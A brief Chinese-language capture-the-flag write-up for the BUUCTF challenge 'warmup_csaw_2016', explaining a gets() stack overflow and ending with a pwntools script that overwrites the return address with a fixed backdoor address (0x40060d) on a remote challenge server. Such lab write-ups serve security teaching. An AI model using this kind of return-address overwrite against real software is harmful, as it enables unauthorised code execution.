BUUCTF—warmup_csaw_2016
首先我们查看一下保护机制
然后打开64位ida
先是输出了一个函数的地址,然后是一个gets的栈溢出,然后看看这个函数是干什么的,既然人家输出了,肯定有它的作用
点进去发现是个打印flag的后门函数,那么我们把返回地址改成这个函数的地址去执行这个函数就行了,然后这个程序并没有开启地址随机化,所以这个后门函数的地址是固定的0x40060d,那么这题就解决了
from pwn import*
p=remote('node4.buuoj.cn',26098)
#p=process('./warmup')
p.recvuntil('>')
payload=b'a'*0x48+p64(0x40060d)
p.sendline(payload)
p.interactive()